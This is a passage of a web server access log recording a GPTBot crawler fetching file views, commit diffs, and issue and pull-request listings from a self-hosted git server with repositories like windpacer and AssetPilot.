+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:17:28:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:17:28:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 9933] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:17:28:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/OpcConnectionTest.csproj" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcConnectionTest/OpcConnectionTest.csproj" +[17/Feb/2026:17:28:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/OpcConnectionTest.csproj" +[17/Feb/2026:17:28:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcConnectionTest/OpcConnectionTest.csproj" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcConnectionTest/OpcConnectionTest.csproj" +[17/Feb/2026:17:28:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcConnectionTest/OpcConnectionTest.csproj" +[17/Feb/2026:17:29:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 11282] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:17:29:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/ENV_SETUP_GUIDE.md" [Client 74.7.227.38] [Length 6062] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/ENV_SETUP_GUIDE.md" +[17/Feb/2026:17:29:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol/ENV_SETUP_GUIDE.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/ENV_SETUP_GUIDE.md" +[17/Feb/2026:17:29:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/ENV_SETUP_GUIDE.md" +[17/Feb/2026:17:29:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/ENV_SETUP_GUIDE.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/ENV_SETUP_GUIDE.md" +[17/Feb/2026:17:29:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/ENV_SETUP_GUIDE.md" +[17/Feb/2026:17:29:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/ENV_SETUP_GUIDE.md" [Client 74.7.227.38] [Length 999] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/ENV_SETUP_GUIDE.md" +[17/Feb/2026:17:29:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python3.12?follow_symlink=1" [Client 74.7.227.38] [Length 11096] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin" +[17/Feb/2026:17:29:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fCMakeFiles%2f3.31.10%2fCMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 29627] [Gzip 5.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:17:29:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fCMakeFiles%2f3.31.10%2fCMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 24501] [Gzip 4.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:17:29:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fCMakeFiles%2f3.31.10%2fCompilerIdCXX" [Client 74.7.227.38] [Length 54691] [Gzip 12.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:17:29:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11114] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:17:29:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/AssetPilot.spec?display=source" [Client 74.7.227.38] [Length 12456] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/AssetPilot.spec" +[17/Feb/2026:17:29:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/GoldMonitor.spec?display=source" [Client 74.7.227.38] [Length 12413] [Gzip 3.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/GoldMonitor.spec" +[17/Feb/2026:17:29:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresWatchdog/main.cpp?display=source" [Client 74.7.227.38] [Length 16009] [Gzip 4.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/main.cpp" +[17/Feb/2026:17:29:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/AssetPilot.exe?display=rendered" [Client 74.7.227.38] [Length 11032] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/AssetPilot.exe" +[17/Feb/2026:17:29:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresWatchdog/ReadMe.md?display=rendered" [Client 74.7.227.38] [Length 83393] [Gzip 3.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/ReadMe.md" +[17/Feb/2026:17:29:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresWatchdog/libpq.dll?display=rendered" [Client 74.7.227.38] [Length 11057] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libpq.dll" +[17/Feb/2026:17:29:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/GoldMonitor.exe?display=rendered" [Client 74.7.227.38] [Length 11031] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/GoldMonitor.exe" +[17/Feb/2026:17:29:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/files.zip?display=rendered" [Client 74.7.227.38] [Length 11061] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/files.zip" +[17/Feb/2026:17:29:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/watchdog.py?display=source" [Client 74.7.227.38] [Length 16397] [Gzip 5.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/watchdog.py" +[17/Feb/2026:17:29:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/ReadMe.txt?display=rendered" [Client 74.7.227.38] [Length 11118] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/ReadMe.txt" +[17/Feb/2026:17:29:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 9956] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls" +[17/Feb/2026:17:29:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10137] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues" +[17/Feb/2026:17:29:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9959] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=farduedate&state=open&type=all" +[17/Feb/2026:17:29:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9921] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=farduedate&state=all&type=all" +[17/Feb/2026:17:29:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10134] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues" +[17/Feb/2026:17:29:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 9959] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls" +[17/Feb/2026:17:29:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 9950] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls" +[17/Feb/2026:17:29:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10137] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues" +[17/Feb/2026:17:29:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10099] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=recentupdate&state=closed&type=all" +[17/Feb/2026:17:29:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 9945] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls" +[17/Feb/2026:17:29:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10138] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues" +[17/Feb/2026:17:29:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 9955] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls" +[17/Feb/2026:17:29:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10089] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=nearduedate&state=open&type=all" +[17/Feb/2026:17:29:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 9949] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=farduedate&state=closed&type=all" +[17/Feb/2026:17:29:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 9957] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=farduedate&state=closed&type=all" +[17/Feb/2026:17:29:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10088] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=mostcomment&state=open&type=all" +[17/Feb/2026:17:29:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9920] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=farduedate&state=all&type=all" +[17/Feb/2026:17:29:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10043] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:17:29:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10099] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=farduedate&state=open&type=all" +[17/Feb/2026:17:29:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10095] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=recentupdate&state=all&type=all" +[17/Feb/2026:17:29:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10100] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=recentupdate&state=all&type=all" +[17/Feb/2026:17:29:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:17:29:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/requirements.txt?display=rendered" [Client 74.7.227.38] [Length 11165] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/requirements.txt" +[17/Feb/2026:17:29:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/README.md?display=source" [Client 74.7.227.38] [Length 12011] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/README.md" +[17/Feb/2026:17:29:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python3.12?follow_symlink=1" [Client 74.7.227.38] [Length 11089] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin" +[17/Feb/2026:17:29:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10159] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:17:29:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10161] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:17:29:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom6.png" +[17/Feb/2026:17:29:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/assets/images/ControlRoom6.png" +[17/Feb/2026:17:29:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/tags" [Client 74.7.227.38] [Length 7735] [Gzip 2.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver" +[17/Feb/2026:17:29:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10152] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=farduedate&state=all&type=all" +[17/Feb/2026:17:29:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/README.md?display=rendered" [Client 74.7.227.38] [Length 10905] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/README.md" +[17/Feb/2026:17:29:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr 